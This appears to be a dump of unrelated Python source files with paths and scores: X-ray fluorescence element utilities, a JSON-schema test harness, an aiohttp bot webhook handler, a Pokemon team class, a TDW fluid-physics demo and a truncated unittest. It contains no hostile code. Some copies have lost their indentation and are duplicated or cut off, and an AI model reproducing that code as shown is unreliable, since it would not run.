def validate_element_str(element_str):
r"""
    Checks if ``element_str`` is a valid representation of an element according to
    standard notation for chemical formulas. Valid representations of elements can
    be processed by ``xraylib`` tools. This function attempts to find the atomic
    number for the element and returns ``True`` if it succeeds and ``False`` if
    it fails.
    Parameters
    ----------
    element_str: str
        symbolic representation of an element
    Returns
    -------
    ``True`` if ``element_str`` is a valid representation of an element and ``False``
otherwise.
"""
if get_element_atomic_number(element_str):
return True
else:
return False
def parse_compound_formula(compound_formula):
r"""
Parses the chemical formula of a compound and returns the dictionary,
which contains element name, atomic number, number of atoms and mass fraction
in the compound.
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
Returns
-------
dictionary of dictionaries, data on each element in the compound: key -
    symbolic element name, value - a dictionary that contains ``AtomicNumber``,
``nAtoms`` and ``massFraction`` of the element. The elements are sorted
in the order of growing atomic number.
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
xraylib.SetErrorMessages(0) # This is supposed to stop XRayLib from printing
# internal error messages, but it doesn't work
try:
compound_data = xraylib.CompoundParser(compound_formula)
except (SystemError, ValueError):
msg = f"Invalid chemical formula '{compound_formula}' is passed, parsing failed"
raise RuntimeError(msg)
# Now create more manageable structure
compound_dict = {}
for e_an, e_mf, e_na in zip(compound_data["Elements"],
compound_data["massFractions"],
compound_data["nAtoms"]):
e_name = xraylib.AtomicNumberToSymbol(e_an)
compound_dict[e_name] = {"AtomicNumber": e_an,
"nAtoms": e_na,
"massFraction": e_mf}
return compound_dict
def split_compound_mass(compound_formula, compound_mass):
r"""
Computes mass of each element in the compound given total mass of the compound
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
compound_mass: float
total mass of the compound
Returns
-------
dictionary: key - symbolic element name, value - mass of the element
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
compound_dict = parse_compound_formula(compound_formula)
element_dict = {}
for el_name, el_info in compound_dict.items():
element_dict[el_name] = el_info["massFraction"] * compound_mass
return element_dict
def get_supported_eline_list(*, lines=None):
"""
Returns the list of the emission lines supported by ``scikit-beam``
Parameters
----------
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
the list of supported emission line. The lines are in the format ``"Fe_K"`` or ``"Mg_M"``.
"""
if lines is None:
lines = ("K", "L", "M")
eline_list = []
if "K" in lines:
eline_list += K_LINE
if "L" in lines:
eline_list += L_LINE
if "M" in lines:
eline_list += M_LINE
return eline_list
def check_if_eline_supported(eline_name, *, lines=None):
"""
Check if the emission line name is in the list of supported names.
Emission name must be in the format: K_K, Fe_K etc. The list includes K, L and M lines.
The function is case-sensitive.
Parameters
----------
eline_name : str
        name of the emission line (K_K, Fe_K etc. for a valid emission line). In general
        the string may contain an arbitrary sequence of characters, may be empty or None. The
function will return True only if the sequence represents emission line from
the list of supported emission lines.
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
True if ``eline_name`` is in the list of supported emission lines, False otherwise
"""
if not eline_name or not isinstance(eline_name, str):
return False
if eline_name in get_supported_eline_list(lines=lines):
return True
else:
return False
def check_if_eline_is_activated(elemental_line, incident_energy):
"""
Checks if emission line is activated at given incident beam energy
Parameters
----------
elemental_line : str
emission line in the format K_K or Fe_K
incident_energy : float
incident energy in keV
Returns
-------
bool value, indicating if the emission line is activated
"""
# Check if the emission line has correct format
if not re.search(r"^[A-Z][a-z]?_[KLM]([ab]\d?)?$", elemental_line):
raise RuntimeError(f"Elemental line {elemental_line} is improperly formatted")
# The validation of 'elemental_line' is strict enough to do the rest of the processing
# without further checks.
[element, line] = elemental_line.split('_')
line = line.lower()
    if len(line) == 1:
        line += 'a1'
    elif len(line) == 2:
        # e.g. 'ka' -> 'ka1'
        line += "1"
e = Element(element)
if e.cs(incident_energy)[line] == 0:
return False
else:
return True
def generate_eline_list(element_list, *, incident_energy, lines=None):
r"""
Generate a list of emission lines based on the list of elements (``element_list``)
and incident energy. Only the emission lines that are supported by ``scikit-beam``
and activated by the incident energy are included in the list.
Parameters
----------
element_list: list(str)
list of valid element names (e.g. ["S", "Al", "Fe"])
incident_energy: float
incident beam energy, keV
lines: list(str)
tuple or list of strings, that defines, which classes of emission lines to include
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
list(str) - the list of emission lines
Raises
------
RuntimeError is raised if 'lines' contains incorrect specification of emission line class.
"""
if lines is None:
# By default lines "K", "L" and "M" are included in the output list
lines = ("K", "L", "M")
# Verify line selection
invalid_lines = []
for l in lines:
if not re.search(r"^[KLM]$", l):
invalid_lines.append(l)
if invalid_lines:
msg = f"Some of the selected emission lines are incorrect: {invalid_lines}"
raise RuntimeError(msg)
eline_list = []
for element in element_list:
for l in lines:
eline = f"{element}_{l}"
is_activated = check_if_eline_is_activated(eline, incident_energy)
is_supported = check_if_eline_supported(eline)
if is_activated and is_supported:
eline_list.append(eline)
return eline_list
|
pyxrf/core/xrf_utils.py
|
import re
import xraylib
from skbeam.core.constants import XrfElement as Element
from skbeam.core.fitting.xrf_model import K_LINE, L_LINE, M_LINE
def get_element_atomic_number(element_str):
r"""
A wrapper to ``SymbolToAtomicNumber`` function from ``xraylib``.
    Returns atomic number for the symbolic element name (e.g. ``C`` or ``Fe``).
    Parameters
    ----------
    element_str: str
        symbolic representation of an element
Returns
-------
Atomic number of the element ``element_str``. If element is invalid, then
the function returns 0.
"""
xraylib.SetErrorMessages(0) # Turn off error messages from ``xraylib``
try:
val = xraylib.SymbolToAtomicNumber(element_str)
except ValueError:
# Imitate the behavior of xraylib 3
val = 0
return val
def validate_element_str(element_str):
r"""
    Checks if ``element_str`` is a valid representation of an element according to
    standard notation for chemical formulas. Valid representations of elements can
    be processed by ``xraylib`` tools. This function attempts to find the atomic
    number for the element and returns ``True`` if it succeeds and ``False`` if
    it fails.
    Parameters
    ----------
    element_str: str
        symbolic representation of an element
    Returns
    -------
    ``True`` if ``element_str`` is a valid representation of an element and ``False``
otherwise.
"""
if get_element_atomic_number(element_str):
return True
else:
return False
def parse_compound_formula(compound_formula):
r"""
Parses the chemical formula of a compound and returns the dictionary,
which contains element name, atomic number, number of atoms and mass fraction
in the compound.
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
Returns
-------
dictionary of dictionaries, data on each element in the compound: key -
    symbolic element name, value - a dictionary that contains ``AtomicNumber``,
``nAtoms`` and ``massFraction`` of the element. The elements are sorted
in the order of growing atomic number.
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
xraylib.SetErrorMessages(0) # This is supposed to stop XRayLib from printing
# internal error messages, but it doesn't work
try:
compound_data = xraylib.CompoundParser(compound_formula)
except (SystemError, ValueError):
msg = f"Invalid chemical formula '{compound_formula}' is passed, parsing failed"
raise RuntimeError(msg)
# Now create more manageable structure
compound_dict = {}
for e_an, e_mf, e_na in zip(compound_data["Elements"],
compound_data["massFractions"],
compound_data["nAtoms"]):
e_name = xraylib.AtomicNumberToSymbol(e_an)
compound_dict[e_name] = {"AtomicNumber": e_an,
"nAtoms": e_na,
"massFraction": e_mf}
return compound_dict
def split_compound_mass(compound_formula, compound_mass):
r"""
Computes mass of each element in the compound given total mass of the compound
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
compound_mass: float
total mass of the compound
Returns
-------
dictionary: key - symbolic element name, value - mass of the element
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
compound_dict = parse_compound_formula(compound_formula)
element_dict = {}
for el_name, el_info in compound_dict.items():
element_dict[el_name] = el_info["massFraction"] * compound_mass
return element_dict
def get_supported_eline_list(*, lines=None):
"""
Returns the list of the emission lines supported by ``scikit-beam``
Parameters
----------
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
the list of supported emission line. The lines are in the format ``"Fe_K"`` or ``"Mg_M"``.
"""
if lines is None:
lines = ("K", "L", "M")
eline_list = []
if "K" in lines:
eline_list += K_LINE
if "L" in lines:
eline_list += L_LINE
if "M" in lines:
eline_list += M_LINE
return eline_list
def check_if_eline_supported(eline_name, *, lines=None):
"""
Check if the emission line name is in the list of supported names.
Emission name must be in the format: K_K, Fe_K etc. The list includes K, L and M lines.
The function is case-sensitive.
Parameters
----------
eline_name : str
        name of the emission line (K_K, Fe_K etc. for a valid emission line). In general
        the string may contain an arbitrary sequence of characters, may be empty or None. The
function will return True only if the sequence represents emission line from
the list of supported emission lines.
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
True if ``eline_name`` is in the list of supported emission lines, False otherwise
"""
if not eline_name or not isinstance(eline_name, str):
return False
if eline_name in get_supported_eline_list(lines=lines):
return True
else:
return False
def check_if_eline_is_activated(elemental_line, incident_energy):
"""
Checks if emission line is activated at given incident beam energy
Parameters
----------
elemental_line : str
emission line in the format K_K or Fe_K
incident_energy : float
incident energy in keV
Returns
-------
bool value, indicating if the emission line is activated
"""
# Check if the emission line has correct format
if not re.search(r"^[A-Z][a-z]?_[KLM]([ab]\d?)?$", elemental_line):
raise RuntimeError(f"Elemental line {elemental_line} is improperly formatted")
# The validation of 'elemental_line' is strict enough to do the rest of the processing
# without further checks.
[element, line] = elemental_line.split('_')
line = line.lower()
    if len(line) == 1:
        line += 'a1'
    elif len(line) == 2:
        # e.g. 'ka' -> 'ka1'
        line += "1"
e = Element(element)
if e.cs(incident_energy)[line] == 0:
return False
else:
return True
def generate_eline_list(element_list, *, incident_energy, lines=None):
r"""
Generate a list of emission lines based on the list of elements (``element_list``)
and incident energy. Only the emission lines that are supported by ``scikit-beam``
and activated by the incident energy are included in the list.
Parameters
----------
element_list: list(str)
list of valid element names (e.g. ["S", "Al", "Fe"])
incident_energy: float
incident beam energy, keV
lines: list(str)
tuple or list of strings, that defines, which classes of emission lines to include
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
list(str) - the list of emission lines
Raises
------
RuntimeError is raised if 'lines' contains incorrect specification of emission line class.
"""
if lines is None:
# By default lines "K", "L" and "M" are included in the output list
lines = ("K", "L", "M")
# Verify line selection
invalid_lines = []
for l in lines:
if not re.search(r"^[KLM]$", l):
invalid_lines.append(l)
if invalid_lines:
msg = f"Some of the selected emission lines are incorrect: {invalid_lines}"
raise RuntimeError(msg)
eline_list = []
for element in element_list:
for l in lines:
eline = f"{element}_{l}"
is_activated = check_if_eline_is_activated(eline, incident_energy)
is_supported = check_if_eline_supported(eline)
if is_activated and is_supported:
eline_list.append(eline)
return eline_list
| 0.891138 | 0.637031 |
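A standalone sketch of the emission-line name check performed by check_if_eline_is_activated above; only the regular expression is exercised here, so no xraylib or scikit-beam installation is needed.

import re

ELINE_RE = re.compile(r"^[A-Z][a-z]?_[KLM]([ab]\d?)?$")

for name in ("Fe_K", "Mg_M", "Fe_Ka1", "fe_K", "Fe_X"):
    print(name, bool(ELINE_RE.search(name)))
# Fe_K, Mg_M and Fe_Ka1 match; 'fe_K' (lower-case element) and 'Fe_X' (unknown line class) do not.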
import json
import os
import random
import socket
import subprocess
import sys
from time import sleep
from urllib.parse import urlparse
import pytest
import jsonschema_rs
TEST_SUITE_PATH = "../../jsonschema/tests/suite"
EXPONENTIAL_BASE = 2
JITTER = (0.0, 0.5)
INITIAL_RETRY_DELAY = 0.05
MAX_WAITING_RETRIES = 10
def is_available(url: str) -> bool:
"""Whether the `url` is available for connection or not."""
parsed = urlparse(url)
try:
with socket.create_connection((parsed.hostname, parsed.port or 80)):
return True
except ConnectionError:
return False
def wait_until_responsive(url: str, retries: int = MAX_WAITING_RETRIES, delay: float = INITIAL_RETRY_DELAY) -> None:
while retries > 0:
if is_available(url):
return
retries -= 1
delay *= EXPONENTIAL_BASE
delay += random.uniform(*JITTER)
sleep(delay)
raise RuntimeError(f"{url} is not available")
@pytest.fixture(scope="session", autouse=True)
def mock_server():
process = subprocess.Popen(args=[sys.executable, f"{TEST_SUITE_PATH}/bin/jsonschema_suite", "serve"])
wait_until_responsive("http://127.0.0.1:1234")
try:
yield
finally:
process.terminate()
SUPPORTED_DRAFTS = (4, 6, 7)
NOT_SUPPORTED_CASES = {
4: ("bignum.json", "email.json"),
6: ("bignum.json", "email.json"),
7: ("bignum.json", "email.json", "idn-hostname.json"),
}
def load_file(path):
with open(path, mode="r", encoding="utf-8") as fd:
for block in json.load(fd):
yield block
def maybe_optional(draft, schema, instance, expected, description, filename):
output = (filename, draft, schema, instance, expected, description)
if filename in NOT_SUPPORTED_CASES.get(draft, ()):
output = pytest.param(*output, marks=pytest.mark.skip(reason=f"{filename} is not supported"))
return output
def pytest_generate_tests(metafunc):
cases = [
maybe_optional(draft, block["schema"], test["data"], test["valid"], test["description"], filename)
for draft in SUPPORTED_DRAFTS
for root, dirs, files in os.walk(f"{TEST_SUITE_PATH}/tests/draft{draft}/")
for filename in files
for block in load_file(os.path.join(root, filename))
for test in block["tests"]
]
metafunc.parametrize("filename, draft, schema, instance, expected, description", cases)
def test_draft(filename, draft, schema, instance, expected, description):
error_message = f"[{filename}] {description}: {schema} | {instance}"
try:
result = jsonschema_rs.is_valid(schema, instance, int(draft))
assert result is expected, error_message
except ValueError:
pytest.fail(error_message)
|
bindings/python/tests-py/test_suite.py
|
import json
import os
import random
import socket
import subprocess
import sys
from time import sleep
from urllib.parse import urlparse
import pytest
import jsonschema_rs
TEST_SUITE_PATH = "../../jsonschema/tests/suite"
EXPONENTIAL_BASE = 2
JITTER = (0.0, 0.5)
INITIAL_RETRY_DELAY = 0.05
MAX_WAITING_RETRIES = 10
def is_available(url: str) -> bool:
"""Whether the `url` is available for connection or not."""
parsed = urlparse(url)
try:
with socket.create_connection((parsed.hostname, parsed.port or 80)):
return True
except ConnectionError:
return False
def wait_until_responsive(url: str, retries: int = MAX_WAITING_RETRIES, delay: float = INITIAL_RETRY_DELAY) -> None:
while retries > 0:
if is_available(url):
return
retries -= 1
delay *= EXPONENTIAL_BASE
delay += random.uniform(*JITTER)
sleep(delay)
raise RuntimeError(f"{url} is not available")
@pytest.fixture(scope="session", autouse=True)
def mock_server():
process = subprocess.Popen(args=[sys.executable, f"{TEST_SUITE_PATH}/bin/jsonschema_suite", "serve"])
wait_until_responsive("http://127.0.0.1:1234")
try:
yield
finally:
process.terminate()
SUPPORTED_DRAFTS = (4, 6, 7)
NOT_SUPPORTED_CASES = {
4: ("bignum.json", "email.json"),
6: ("bignum.json", "email.json"),
7: ("bignum.json", "email.json", "idn-hostname.json"),
}
def load_file(path):
with open(path, mode="r", encoding="utf-8") as fd:
for block in json.load(fd):
yield block
def maybe_optional(draft, schema, instance, expected, description, filename):
output = (filename, draft, schema, instance, expected, description)
if filename in NOT_SUPPORTED_CASES.get(draft, ()):
output = pytest.param(*output, marks=pytest.mark.skip(reason=f"{filename} is not supported"))
return output
def pytest_generate_tests(metafunc):
cases = [
maybe_optional(draft, block["schema"], test["data"], test["valid"], test["description"], filename)
for draft in SUPPORTED_DRAFTS
for root, dirs, files in os.walk(f"{TEST_SUITE_PATH}/tests/draft{draft}/")
for filename in files
for block in load_file(os.path.join(root, filename))
for test in block["tests"]
]
metafunc.parametrize("filename, draft, schema, instance, expected, description", cases)
def test_draft(filename, draft, schema, instance, expected, description):
error_message = f"[{filename}] {description}: {schema} | {instance}"
try:
result = jsonschema_rs.is_valid(schema, instance, int(draft))
assert result is expected, error_message
except ValueError:
pytest.fail(error_message)
| 0.334916 | 0.16455 |
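A self-contained sketch of the exponential-backoff-with-jitter loop used by wait_until_responsive above, with a fake probe standing in for the socket check.

import random
from time import sleep

def wait_until(probe, retries=5, delay=0.05, base=2, jitter=(0.0, 0.5)):
    while retries > 0:
        if probe():
            return
        retries -= 1
        delay = delay * base + random.uniform(*jitter)  # grow the delay and add jitter
        sleep(delay)
    raise RuntimeError("resource did not become available")

attempts = iter([False, False, True])
wait_until(lambda: next(attempts))  # succeeds on the third probe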
from aiohttp import web
import asyncio
import asyncio.tasks
import datetime
import functools
import logging
import itertools
import typing
import json
from ..models import Update
from ..utils import helper
DEFAULT_WEB_PATH = '/webhook'
DEFAULT_ROUTE_NAME = 'webhook_handler'
BOT_DISPATCHER_KEY = 'BOT_DISPATCHER'
RESPONSE_TIMEOUT = 55
WEBHOOK = 'webhook'
WEBHOOK_CONNECTION = 'WEBHOOK_CONNECTION'
WEBHOOK_REQUEST = 'WEBHOOK_REQUEST'
log = logging.getLogger(__name__)
class PyAituWarning(Warning):
pass
class TimeoutWarning(PyAituWarning):
pass
class WebhookRequestHandler(web.View):
"""
    Simple Webhook request handler for the aiohttp web server.
You need to register that in app:
.. code-block:: python3
app.router.add_route('*', '/your/webhook/path', WebhookRequestHandler, name='webhook_handler')
But first you need to configure application for getting Dispatcher instance from request handler!
It must always be with key 'BOT_DISPATCHER'
.. code-block:: python3
bot = Bot(TOKEN, loop)
dp = Dispatcher(bot)
app['BOT_DISPATCHER'] = dp
"""
def get_dispatcher(self):
"""
Get Dispatcher instance from environment
:return: :class:`aiogram.Dispatcher`
"""
return self.request.app[BOT_DISPATCHER_KEY]
async def parse_updates(self):
"""
        Read updates from the request stream and deserialize them.
"""
data = await self.request.json()
updates = []
for jsonUpdate in data['updates']:
update = Update(jsonUpdate)
updates.append(update)
return updates
async def post(self):
"""
        Process a POST request.
        If one of the handlers returns an instance of :class:`aiogram.dispatcher.webhook.BaseResponse`, return it to the webhook.
        Otherwise do nothing (return 'ok')
:return: :class:`aiohttp.web.Response`
"""
updates = await self.parse_updates()
for update in updates:
dispatcher = self.get_dispatcher()
await dispatcher.updates_handler.notify(update)
return web.Response(text='{"updates":[]}', content_type='application/json')
async def get(self):
return web.Response(text='')
async def head(self):
return web.Response(text='')
class BaseResponse:
"""
Base class for webhook responses.
"""
@property
def method(self) -> str:
"""
        In all subclasses of this class you need to override this property
:return: str
"""
raise NotImplementedError
def prepare(self) -> typing.Dict:
"""
You need to override this method.
:return: response parameters dict
"""
raise NotImplementedError
def cleanup(self) -> typing.Dict:
"""
Cleanup response after preparing. Remove empty fields.
:return: response parameters dict
"""
return {k: v for k, v in self.prepare().items() if v is not None}
def get_response(self):
"""
Get response object
:return:
"""
return {'method': self.method, **self.cleanup()}
def get_web_response(self):
"""
Get prepared web response with JSON data.
:return: :class:`aiohttp.web.Response`
"""
return web.json_response(self.get_response(), dumps=json.dumps)
async def execute_response(self, bot):
"""
Use this method if you want to execute response as simple HTTP request.
:param bot: Bot instance.
:return:
"""
method_name = helper.HelperMode.apply(self.method, helper.HelperMode.snake_case)
method = getattr(bot, method_name, None)
if method:
return await method(**self.cleanup())
return await bot.request(self.method, self.cleanup())
async def __call__(self, bot=None):
return await self.execute_response(bot)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
return await self()
|
pyAitu/dispatcher/webhook.py
|
from aiohttp import web
import asyncio
import asyncio.tasks
import datetime
import functools
import logging
import itertools
import typing
import json
from ..models import Update
from ..utils import helper
DEFAULT_WEB_PATH = '/webhook'
DEFAULT_ROUTE_NAME = 'webhook_handler'
BOT_DISPATCHER_KEY = 'BOT_DISPATCHER'
RESPONSE_TIMEOUT = 55
WEBHOOK = 'webhook'
WEBHOOK_CONNECTION = 'WEBHOOK_CONNECTION'
WEBHOOK_REQUEST = 'WEBHOOK_REQUEST'
log = logging.getLogger(__name__)
class PyAituWarning(Warning):
pass
class TimeoutWarning(PyAituWarning):
pass
class WebhookRequestHandler(web.View):
"""
    Simple Webhook request handler for the aiohttp web server.
You need to register that in app:
.. code-block:: python3
app.router.add_route('*', '/your/webhook/path', WebhookRequestHandler, name='webhook_handler')
But first you need to configure application for getting Dispatcher instance from request handler!
It must always be with key 'BOT_DISPATCHER'
.. code-block:: python3
bot = Bot(TOKEN, loop)
dp = Dispatcher(bot)
app['BOT_DISPATCHER'] = dp
"""
def get_dispatcher(self):
"""
Get Dispatcher instance from environment
:return: :class:`aiogram.Dispatcher`
"""
return self.request.app[BOT_DISPATCHER_KEY]
async def parse_updates(self):
"""
        Read updates from the request stream and deserialize them.
"""
data = await self.request.json()
updates = []
for jsonUpdate in data['updates']:
update = Update(jsonUpdate)
updates.append(update)
return updates
async def post(self):
"""
        Process a POST request.
        If one of the handlers returns an instance of :class:`aiogram.dispatcher.webhook.BaseResponse`, return it to the webhook.
        Otherwise do nothing (return 'ok')
:return: :class:`aiohttp.web.Response`
"""
updates = await self.parse_updates()
for update in updates:
dispatcher = self.get_dispatcher()
await dispatcher.updates_handler.notify(update)
return web.Response(text='{"updates":[]}', content_type='application/json')
async def get(self):
return web.Response(text='')
async def head(self):
return web.Response(text='')
class BaseResponse:
"""
Base class for webhook responses.
"""
@property
def method(self) -> str:
"""
        In all subclasses of this class you need to override this property
:return: str
"""
raise NotImplementedError
def prepare(self) -> typing.Dict:
"""
You need to override this method.
:return: response parameters dict
"""
raise NotImplementedError
def cleanup(self) -> typing.Dict:
"""
Cleanup response after preparing. Remove empty fields.
:return: response parameters dict
"""
return {k: v for k, v in self.prepare().items() if v is not None}
def get_response(self):
"""
Get response object
:return:
"""
return {'method': self.method, **self.cleanup()}
def get_web_response(self):
"""
Get prepared web response with JSON data.
:return: :class:`aiohttp.web.Response`
"""
return web.json_response(self.get_response(), dumps=json.dumps)
async def execute_response(self, bot):
"""
Use this method if you want to execute response as simple HTTP request.
:param bot: Bot instance.
:return:
"""
method_name = helper.HelperMode.apply(self.method, helper.HelperMode.snake_case)
method = getattr(bot, method_name, None)
if method:
return await method(**self.cleanup())
return await bot.request(self.method, self.cleanup())
async def __call__(self, bot=None):
return await self.execute_response(bot)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
return await self()
| 0.534612 | 0.093885 |
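A hedged wiring sketch based on the docstring in the record above: register the handler on an aiohttp application and expose the dispatcher under the BOT_DISPATCHER key. The commented imports are assumptions about pyAitu's layout and may differ from the actual package.

from aiohttp import web
# from pyAitu import Bot, Dispatcher                           # assumed import path
# from pyAitu.dispatcher.webhook import WebhookRequestHandler  # assumed import path

def make_app(dispatcher, handler_cls, dispatcher_key="BOT_DISPATCHER"):
    app = web.Application()
    app[dispatcher_key] = dispatcher                     # the handler looks this up on each request
    app.router.add_route("*", "/webhook", handler_cls, name="webhook_handler")
    return app

# web.run_app(make_app(dp, WebhookRequestHandler), port=8080)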
import asyncio
from typing import List
from readchar import *
from api import pokeapi
from config.config import TEXT
from game.pokemon import Pokemon
class Player:
"""Holds current information about the player"""
team: List[Pokemon] = []
def __init__(self):
"""Fills the player's team with a random Pokemon from the PokeAPI"""
self.add_to_team(asyncio.run(pokeapi.get_random_pokemon_from_api()))
# self.team.extend(asyncio.run(pokeapi.get_random_pokemons_from_api(2)))
def add_to_team(self, pokemon: Pokemon):
"""Add a pokemon to the user's team and inform the user"""
self.team.append(pokemon)
print(f"{pokemon.name} {TEXT['POKEMON']['ADD']}")
def remove_from_team(self):
"""Prompts user to remove a pokemon from the user's team"""
is_tossing = True
while is_tossing:
if len(self.team) <= 1:
print(TEXT["TEAM"]["SIZE_ERROR"], end="\n" * 2)
is_tossing = False
else:
print(TEXT["TEAM"]["TOSS"])
print(
*[f"{str(i+1)}. {slot.name}" for i, slot in enumerate(self.team)],
sep="\n",
)
print(TEXT["TEAM"]["EXIT"], end="\n" * 2)
is_tossing = self.__attempt_toss()
def __attempt_toss(self) -> bool:
"""Receives user input and attempts to toss a pokemon"""
try:
choice = readkey()
player_toss_index = int(choice) - 1
player_toss_choice = self.team[player_toss_index]
if player_toss_index < 0:
raise IndexError
print(
f"{player_toss_choice.name} {TEXT['TEAM']['RESULT']} {player_toss_choice.name}!",
end="\n" * 2,
)
self.team.pop(player_toss_index)
return False
except IndexError:
# Index not found in team
print(TEXT["TEAM"]["EXIST_ERROR"], end="\n" * 2)
return True
except ValueError:
# Key other than number was pressed
return False
def print_team(self):
"""Prints a formatted table of the player's team"""
header = "{:4} {:^11} {:6} {:^9}{:^9}".format(
"No.", "Name", "Health", "Type", "Type 2"
)
print(header)
print(*[str(pokemon) for pokemon in self.team], sep="\n", end="\n" * 2)
"""Global Player instance"""
PLAYER = Player()
|
game/player.py
| 0.605216 | 0.318591 |
from tdw.controller import Controller
from tdw.tdw_utils import TDWUtils
from time import sleep
from platform import system
"""
Create a fluid "container" with the NVIDIA Flex physics engine. Run several trials, dropping ball objects of increasing mass into the fluid.
"""
class FlexFluid(Controller):
def run(self):
if system() != "Windows":
raise Exception("Flex fluids are only supported in Windows (see Documentation/misc_frontend/flex.md)")
self.load_streamed_scene(scene="tdw_room")
# Create the container, set up for fluids.
self.communicate({"$type": "create_flex_container",
"collision_distance": 0.04,
"static_friction": 0.1,
"dynamic_friction": 0.1,
"particle_friction": 0.1,
"viscocity": 0.001,
"cohesion": 0.0015,
"radius": 0.1,
"fluid_rest": 0.05,
"damping": 0.01,
"substep_count": 5,
"iteration_count": 5,
"buoyancy": 1.0})
# Slow down physics so the water can settle without splashing out of the container.
self.communicate({"$type": "set_time_step", "time_step": 0.005})
# Create the avatar.
self.communicate(TDWUtils.create_avatar(position={"x": -3.75, "y": 1.5, "z": -0.5}, look_at={"x": 0, "y": 0, "z": 0}))
# Load a pool container for the fluid.
self.pool_id = self.add_object("fluid_receptacle1x1", position={"x": -0.35, "y": 0, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": self.pool_id, "scale_factor": {"x": 2.0, "y": 2.0, "z":2.0}}, {"$type": "set_kinematic_state", "id": self.pool_id, "is_kinematic": True, "use_gravity": False}])
# Add the fluid actor, using the FluidPrimitive.
self.fluid_id = self.get_unique_id()
self.communicate({"$type": "load_flex_fluid_from_resources", "id": self.fluid_id, "orientation": {"x": 0, "y": 0, "z": 0}, "position": {"x": -0.35, "y": 1.0, "z": 0}})
# Assign the actor's container and set the Flex scale (this MUST be done, even if the scale is 1,1,1).
self.communicate([{"$type": "create_flex_fluid_object",
"id": self.fluid_id,
"mass_scale": 1.0,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": self.fluid_id,
"container_id": 0, "fluid_container": True}
])
# Pause for a while to look at the container while it fills with water (this is not required, simply for demo purposes).
for i in range(500):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Set physics back to a normal rate, for the trials.
self.communicate({"$type": "set_time_step", "time_step": 0.03})
# Set up the data for five "trials" and run them.
masses = [1.25, 2.5, 4.0, 6.65, 8.5]
heights = [3.0, 3.0, 3.0, 3.0, 3.0]
stim_times = [170, 170, 170, 170, 170]
pause_times = [0.1, 0.1, 0.1, 0.1, 0.1]
for mass, height, stim_time, pause_time in zip(masses, heights, stim_times, pause_times):
self.do_trial(mass, height, stim_time, pause_time)
    def do_trial(self, obj_mass: float, height: float, stim_time: int, pause_time: float):
# Add the sphere object.
sphere_id = self.add_object("prim_sphere", position={"x": 0, "y": height, "z": 0}, rotation={"x": 0, "y": 0, "z": 0}, library="models_special.json")
self.communicate([{"$type": "scale_object", "id": sphere_id, "scale_factor": {"x": 0.4, "y": 0.4, "z": 0.4}}, {"$type": "set_kinematic_state", "id": sphere_id}])
# Set the object to kinematic.
# Set the solid actor.
# Assign the actor's container.
self.communicate([
{"$type": "set_flex_solid_actor",
"id": sphere_id,
"mass_scale": obj_mass,
"particle_spacing": 0.05},
{"$type": "assign_flex_container",
"id": sphere_id,
"container_id": 0}
])
        # Look at the pool for the passed-in "look" time.
for i in range(stim_time):
# Look at the object.
self.communicate({"$type": "look_at",
"avatar_id": "a",
"object_id": self.pool_id,
"use_centroid": True})
# Destroy the object and pause for the passed-in pause time.
self.communicate({"$type": "destroy_object", "id": sphere_id})
sleep(pause_time)
if __name__ == "__main__":
FlexFluid().run()
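# The trial loop above zips four parallel lists; the same data can be expressed
# as one list of records, which is easier to extend. A purely illustrative
# sketch (values copied from the lists in run()):
from typing import NamedTuple
class Trial(NamedTuple):
    mass: float
    height: float
    stim_time: int
    pause_time: float
TRIALS = [
    Trial(1.25, 3.0, 170, 0.1),
    Trial(2.5, 3.0, 170, 0.1),
    Trial(4.0, 3.0, 170, 0.1),
    Trial(6.65, 3.0, 170, 0.1),
    Trial(8.5, 3.0, 170, 0.1),
]
# for t in TRIALS:
#     controller.do_trial(t.mass, t.height, t.stim_time, t.pause_time)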
|
Python/example_controllers/flex_fluid_object.py
| 0.623033 | 0.353596 |
from unittest import TestCase
from unittest.mock import MagicMock
import numpy as np
from pynwb import NWBFile
from testfixtures import should_raise
from rec_to_nwb.processing.exceptions.missing_data_exception import MissingDataException
from rec_to_nwb.processing.nwb.components.mda.time.valid.fl_mda_valid_time_manager import FlMdaValidTimeManager
class TestMdaValidTimeManager(TestCase):
def test_fl_mda_valid_time_manager_not_initialized_due_to_None_param(self):
with self.assertRaises(TypeError):
FlMdaValidTimeManager(None)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_with_gap_in_middle(self):
sampling_rate = 1.0
gaps_margin = 0.0001
mock_array = np.ndarray(dtype='float', shape=[10,])
